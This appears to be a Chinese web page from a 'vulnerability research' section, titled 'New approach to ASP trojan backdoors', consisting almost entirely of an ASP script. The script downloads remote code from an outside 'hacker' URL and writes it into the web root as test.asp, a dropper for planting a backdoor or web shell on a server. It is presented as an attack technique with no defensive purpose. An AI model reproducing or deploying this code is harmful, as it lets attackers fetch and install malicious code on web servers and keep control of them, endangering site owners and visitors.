漏洞研究

关注公众号 jb51net

关闭
首页 > 实用技巧 > 漏洞研究 >

ASP木马后门新思路

作者:

ASP木马后门新思路
<%  
Function GetPage(url)  
dim Retrieval  
Set Retrieval = createObject("Microsoft.XMLHTTP")  
With Retrieval  
.Open "Get", url, False ', "", ""  
.Send  
GetPage = BytesToBstr(.ResponseBody)  
End With  
Set Retrieval = Nothing  
End Function  

Function BytesToBstr(body)  
dim objstream  
set objstream = Server.createObject("adodb.stream")  
objstream.Type = 1  
objstream.Mode =3  
objstream.Open  
objstream.Write body  
objstream.Position = 0  
objstream.Type = 2  
objstream.Charset = "GB2312"  
BytesToBstr = objstream.ReadText  
objstream.Close  
set objstream = nothing  
End Function  
on error resume next  
Url="http://www.heibai.org/hacker/daemon.txt"  
response.write "开始取得远程代码........"  
wstr = GetPage(Url)  

Set fs=Server.createObject("Scripting.FileSystemObject")  

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")  
Crfi.Writeline(wstr)  
set CrFi=nothing  
set fs=nothing  
response.write "...<font color=red>生成test.asp文件成功</font>"  
%>  
阅读全文